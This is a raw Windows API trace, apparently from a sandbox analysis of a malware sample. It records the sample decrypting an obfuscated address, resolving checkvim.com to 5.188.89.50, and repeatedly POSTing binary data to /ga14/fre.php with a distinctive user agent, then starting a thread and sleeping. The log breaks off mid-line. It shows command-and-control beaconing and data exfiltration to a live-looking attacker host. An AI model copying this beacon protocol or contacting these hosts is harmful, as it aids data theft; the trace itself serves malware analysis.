[0314.354] GetProcessHeap () returned 0x840000 [0314.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0314.354] GetProcessHeap () returned 0x840000 [0314.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f830 [0314.354] GetProcessHeap () returned 0x840000 [0314.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0314.354] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0314.355] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0314.355] GetProcessHeap () returned 0x840000 [0314.355] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0314.355] GetProcessHeap () returned 0x840000 [0314.355] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0314.355] send (s=0x544, buf=0x873a58*, len=237, flags=0) returned 237 [0314.356] send (s=0x544, buf=0x87eb58*, len=159, flags=0) returned 159 [0314.356] GetProcessHeap () returned 0x840000 [0314.356] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0314.356] recv (in: s=0x544, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0314.696] GetProcessHeap () returned 0x840000 [0314.696] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0314.696] GetProcessHeap () returned 0x840000 [0314.696] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0314.696] GetProcessHeap () returned 0x840000 [0314.696] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0314.696] GetProcessHeap () returned 0x840000 [0314.696] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0314.696] closesocket (s=0x544) returned 0 [0314.697] GetProcessHeap () returned 0x840000 [0314.697] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0314.698] GetProcessHeap () returned 0x840000 [0314.698] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0314.698] GetProcessHeap () returned 0x840000 [0314.698] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0314.698] GetProcessHeap () returned 0x840000 [0314.698] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0314.698] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x768) returned 0x544 [0314.699] Sleep (dwMilliseconds=0xea60) [0314.721] GetProcessHeap () returned 0x840000 [0314.721] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7e8 [0314.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.722] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0314.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.729] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0314.738] GetProcessHeap () returned 0x840000 [0314.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0314.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.739] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0314.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.740] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0314.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.741] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.741] GetProcessHeap () returned 0x840000 [0314.741] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0314.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.742] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7e8, pdwDataLen=0x19f9a4 | out: pbData=0x87f7e8, pdwDataLen=0x19f9a4) returned 1 [0314.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.743] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0314.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.743] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0314.743] GetProcessHeap () returned 0x840000 [0314.743] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0314.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.745] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.745] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.746] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.747] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.747] GetProcessHeap () returned 0x840000 [0314.747] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0314.747] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0314.748] GetProcessHeap () returned 0x840000 [0314.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0314.748] GetProcessHeap () returned 0x840000 [0314.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0314.748] GetProcessHeap () returned 0x840000 [0314.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0314.748] GetProcessHeap () returned 0x840000 [0314.748] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0314.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.749] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0314.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.756] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0314.762] GetProcessHeap () returned 0x840000 [0314.762] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0314.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.763] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0314.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.763] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0314.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.764] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.764] GetProcessHeap () returned 0x840000 [0314.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0314.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.765] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0314.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.766] CryptDestroyKey (hKey=0x87e870) returned 1 [0314.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.767] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0314.767] GetProcessHeap () returned 0x840000 [0314.767] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0314.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.769] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0314.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.770] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0314.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.771] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0314.771] GetProcessHeap () returned 0x840000 [0314.771] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0314.771] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0314.773] GetProcessHeap () returned 0x840000 [0314.773] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0314.773] socket (af=2, type=1, protocol=6) returned 0x548 [0314.774] connect (s=0x548, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0314.846] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0314.846] GetProcessHeap () returned 0x840000 [0314.846] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0314.846] GetProcessHeap () returned 0x840000 [0314.846] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0314.847] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0314.848] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0314.848] GetProcessHeap () returned 0x840000 [0314.848] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0314.848] GetProcessHeap () returned 0x840000 [0314.848] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0314.848] GetProcessHeap () returned 0x840000 [0314.848] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0314.848] GetProcessHeap () returned 0x840000 [0314.848] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0314.849] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0314.849] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0314.849] GetProcessHeap () returned 0x840000 [0314.849] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0314.849] GetProcessHeap () returned 0x840000 [0314.849] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0314.849] send (s=0x548, buf=0x873a58*, len=237, flags=0) returned 237 [0314.850] send (s=0x548, buf=0x87eb58*, len=159, flags=0) returned 159 [0314.850] GetProcessHeap () returned 0x840000 [0314.850] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0314.850] recv (in: s=0x548, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0315.238] GetProcessHeap () returned 0x840000 [0315.238] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0315.238] GetProcessHeap () returned 0x840000 [0315.239] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0315.239] GetProcessHeap () returned 0x840000 [0315.239] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0315.239] GetProcessHeap () returned 0x840000 [0315.239] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0315.239] closesocket (s=0x548) returned 0 [0315.240] GetProcessHeap () returned 0x840000 [0315.240] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0315.240] GetProcessHeap () returned 0x840000 [0315.240] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0315.240] GetProcessHeap () returned 0x840000 [0315.240] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0315.240] GetProcessHeap () returned 0x840000 [0315.240] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0315.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x5a4) returned 0x548 [0315.242] Sleep (dwMilliseconds=0xea60) [0315.244] GetProcessHeap () returned 0x840000 [0315.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fbd8 [0315.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.245] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0315.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.252] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0315.258] GetProcessHeap () returned 0x840000 [0315.258] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0315.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.259] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0315.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.260] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0315.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.261] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.261] GetProcessHeap () returned 0x840000 [0315.261] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0315.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.262] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fbd8, pdwDataLen=0x19f9a4 | out: pbData=0x87fbd8, pdwDataLen=0x19f9a4) returned 1 [0315.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.262] CryptDestroyKey (hKey=0x87e930) returned 1 [0315.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.263] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0315.263] GetProcessHeap () returned 0x840000 [0315.263] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0315.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.264] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.265] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.266] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.267] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.267] GetProcessHeap () returned 0x840000 [0315.267] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0315.267] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0315.267] GetProcessHeap () returned 0x840000 [0315.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0315.267] GetProcessHeap () returned 0x840000 [0315.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0315.267] GetProcessHeap () returned 0x840000 [0315.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0315.267] GetProcessHeap () returned 0x840000 [0315.267] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0315.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.268] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0315.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.273] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0315.278] GetProcessHeap () returned 0x840000 [0315.278] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0315.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.279] CryptImportKey (in: hProv=0x86fa40, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0315.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.280] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0315.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.281] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.281] GetProcessHeap () returned 0x840000 [0315.281] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0315.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.282] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0315.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.282] CryptDestroyKey (hKey=0x87e930) returned 1 [0315.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.283] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0315.283] GetProcessHeap () returned 0x840000 [0315.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0315.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.284] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0315.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.285] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0315.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.286] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0315.286] GetProcessHeap () returned 0x840000 [0315.286] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0315.286] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0315.288] GetProcessHeap () returned 0x840000 [0315.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0315.288] socket (af=2, type=1, protocol=6) returned 0x54c [0315.288] connect (s=0x54c, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0315.370] FreeAddrInfoW (pAddrInfo=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0315.373] GetProcessHeap () returned 0x840000 [0315.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0315.373] GetProcessHeap () returned 0x840000 [0315.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0315.374] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0315.375] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0315.375] GetProcessHeap () returned 0x840000 [0315.375] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0315.375] GetProcessHeap () returned 0x840000 [0315.375] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0315.375] GetProcessHeap () returned 0x840000 [0315.375] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0315.375] GetProcessHeap () returned 0x840000 [0315.375] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0315.376] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0315.376] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0315.376] GetProcessHeap () returned 0x840000 [0315.376] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0315.376] GetProcessHeap () returned 0x840000 [0315.376] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0315.376] send (s=0x54c, buf=0x873a58*, len=237, flags=0) returned 237 [0315.377] send (s=0x54c, buf=0x87eb58*, len=159, flags=0) returned 159 [0315.377] GetProcessHeap () returned 0x840000 [0315.377] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0315.377] recv (in: s=0x54c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0315.745] GetProcessHeap () returned 0x840000 [0315.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0315.745] GetProcessHeap () returned 